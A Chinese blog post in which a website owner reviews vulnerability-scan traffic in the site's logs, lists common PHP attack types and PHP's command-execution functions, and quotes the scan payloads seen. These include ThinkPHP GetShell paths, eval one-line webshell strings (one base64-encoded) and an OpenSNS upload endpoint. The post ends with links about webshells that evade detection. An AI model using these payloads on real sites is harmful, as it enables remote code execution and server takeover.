最近发现网站来了大量的搜索请求,看了一下,基本上都是黑客类型的关键词,大体研究了一下,这些基本上都是利用各种开源系统的漏洞进行的扫描,比如thinkPHP,一般来说,这种扫描不应该是当做搜索引擎来是别的,可能是WP的识别不准。学习了一下,其实PHP有很多种攻击方式,来光顾我网站并留下痕迹的主要的漏洞扫描痕迹均为简单方式,有2种途径:(1)上传文件(2)GetShell。
针对PHP的网站主要存在下面几种攻击方式:
1、命令注入(Command Injection)
2、eval注入(Eval Injection)
3、客户端脚本攻击(Script Insertion)
4、跨网站脚本攻击(Cross Site Scripting, XSS)
5、SQL注入攻击(SQL injection)
6、跨网站请求伪造攻击(Cross Site Request Forgeries, CSRF)
7、Session 会话劫持(Session Hijacking)
8、Session 固定攻击(Session Fixation)
9、HTTP响应拆分攻击(HTTP Response Splitting)
10、文件上传漏洞(File Upload Attack)
11、目录穿越漏洞(Directory Traversal)
12、远程文件包含攻击(Remote Inclusion)
13、动态函数注入攻击(Dynamic Variable Evaluation)
14、URL攻击(URL attack)
15、表单提交欺骗攻击(Spoofed Form Submissions)
16、HTTP请求欺骗攻击(Spoofed HTTP Requests)
命令注入攻击
PHP中可以使用下列5个函数来执行外部的应用程序或函数
system、exec、passthru、shell_exec、“(与shell_exec功能相同)
函数原型
string system(string command, int &return_var)
command 要执行的命令
return_var 存放执行命令的执行后的状态值
string exec (string command, array &output, int &return_var)
command 要执行的命令
output 获得执行命令输出的每一行字符串
return_var 存放执行命令后的状态值
void passthru (string command, int &return_var)
command 要执行的命令
return_var 存放执行命令后的状态值
string shell_exec (string command)
command 要执行的命令
在我网站上留下痕迹的各种PHP、JS漏洞扫描痕迹
1、这几个都是thinkPHP的各种漏洞,GetShell
/module/action/param1/${@print(eval($_POST[c]))}
/abc/abc/abc/${@print(eval($_POST[c]))}
/abc/abc/abc/${@print(eval($_POST[c]))}/
/abc/abc/abc/${@print(eval($_POST[1]))}
index/thinkapp/invokefunction
index/thinkContainer/invokefunction
index/thinkviewdriverPhp/display
index/thinkRequest/input
/index/thinkapp/invokefunction
index/thinktemplatedriverfile/write
2、这个是OpenSNS的漏洞,可以上传文件
/Core/File/uploadPictureBase64.html
3、这2个是通用的PHP的一句话木马(参见1)
{${eval($_POST[c])}}
{${eval($_POST[u])}}
4、其他各种漏洞扫描
${$_REQUEST[news](base64_decode(QGV2YWwoJF9QT1NUW3h3XSk))}}
/login/register
vod-search-area-${@print(eval($_POST[c]))} .html
相关信息:
2016年11月整理的最新php免杀一句话木马, 2017php免杀一句话(php过狗一句话,过狗菜刀,2016过狗一句话,2016php免杀一句话,php过waf一句话)